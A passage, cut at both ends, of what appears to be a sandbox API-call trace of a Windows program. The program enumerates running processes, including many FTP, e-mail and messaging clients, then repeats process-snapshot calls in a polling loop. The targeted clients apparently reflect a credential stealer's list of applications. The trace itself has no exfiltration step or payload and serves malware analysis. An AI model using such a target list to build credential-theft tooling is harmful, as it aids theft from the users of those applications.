hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0193.209] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0193.211] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0193.213] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0193.220] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0193.223] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0193.227] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0193.229] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0193.254] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0193.265] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0193.267] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0193.269] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0193.271] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0193.273] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0193.276] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0193.278] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0193.280] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0193.282] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0193.289] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0193.291] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0193.293] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0193.297] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0193.303] Process32Next (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0193.328] Sleep (dwMilliseconds=0x64) [0193.329] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0193.346] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.427] Sleep (dwMilliseconds=0x64) [0193.429] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0193.443] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.521] Sleep (dwMilliseconds=0x64) [0193.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0193.536] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.656] Sleep (dwMilliseconds=0x64) [0193.661] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0193.677] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.767] Sleep (dwMilliseconds=0x64) [0193.771] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0193.787] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.864] Sleep (dwMilliseconds=0x64) [0193.865] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0193.878] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.953] Sleep (dwMilliseconds=0x64) [0193.954] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0193.968] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.102] Sleep (dwMilliseconds=0x64) [0194.126] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0194.143] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.217] Sleep (dwMilliseconds=0x64) [0194.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0194.230] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.371] Sleep (dwMilliseconds=0x64) [0194.377] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0194.401] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.480] Sleep (dwMilliseconds=0x64) [0194.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0194.494] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0194.566] Sleep (dwMilliseconds=0x64) [0194.568] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17ec [0194.591] Process32First (in: hSnapshot=0x17ec, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.922] Sleep (dwMilliseconds=0x64) [0196.106] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x19ac [0196.133] Process32First (in: hSnapshot=0x19ac, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.275] Sleep (dwMilliseconds=0x64) [0196.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d24 [0196.397] Process32First (in: hSnapshot=0x1d24, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.495] Sleep (dwMilliseconds=0x64) [0196.502] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1998 [0196.513] Process32First (in: hSnapshot=0x1998, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.698] Sleep (dwMilliseconds=0x64) [0196.728] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1998 [0196.745] Process32First (in: hSnapshot=0x1998, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0196.837] Sleep (dwMilliseconds=0x64) [0196.842] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cf4 [0196.891] Process32First (in: hSnapshot=0x1cf4, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.082] Sleep (dwMilliseconds=0x64) [0197.121] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0197.176] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.305] Sleep (dwMilliseconds=0x64) [0197.316] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0197.362] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.484] Sleep (dwMilliseconds=0x64) [0197.525] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0197.537] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.739] Sleep (dwMilliseconds=0x64) [0197.766] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0197.904] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.093] Sleep (dwMilliseconds=0x64) [0198.110] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0198.216] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.383] Sleep (dwMilliseconds=0x64) [0198.421] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0198.482] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.697] Sleep (dwMilliseconds=0x64) [0198.737] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0198.754] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.944] Sleep (dwMilliseconds=0x64) [0198.980] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0199.115] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.277] Sleep (dwMilliseconds=0x64) [0199.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0199.330] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.470] Sleep (dwMilliseconds=0x64) [0199.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0199.531] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.681] Sleep (dwMilliseconds=0x64) [0199.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0199.710] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.924] Sleep (dwMilliseconds=0x64) [0199.953] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0199.970] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.230] Sleep (dwMilliseconds=0x64) [0200.324] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0200.339] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.451] Sleep (dwMilliseconds=0x64) [0200.509] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0200.569] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.716] Sleep (dwMilliseconds=0x64) [0200.753] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0200.766] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.930] Sleep (dwMilliseconds=0x64) [0200.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0201.085] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.266] Sleep (dwMilliseconds=0x64) [0201.308] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0201.323] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.542] Sleep (dwMilliseconds=0x64) [0201.594] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0201.646] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0201.888] Sleep (dwMilliseconds=0x64) [0201.929] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0201.943] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.142] Sleep (dwMilliseconds=0x64) [0202.180] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0202.234] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.411] Sleep (dwMilliseconds=0x64) [0202.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0202.471] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.704] Sleep (dwMilliseconds=0x64) [0202.760] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0202.829] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.984] Sleep (dwMilliseconds=0x64) [0203.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0203.067] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.258] Sleep (dwMilliseconds=0x64) [0203.296] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0203.308] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.498] Sleep (dwMilliseconds=0x64) [0203.535] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0203.550] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0203.708] Sleep (dwMilliseconds=0x64) [0203.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d18 [0203.868] Process32First (in: hSnapshot=0x1d18, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 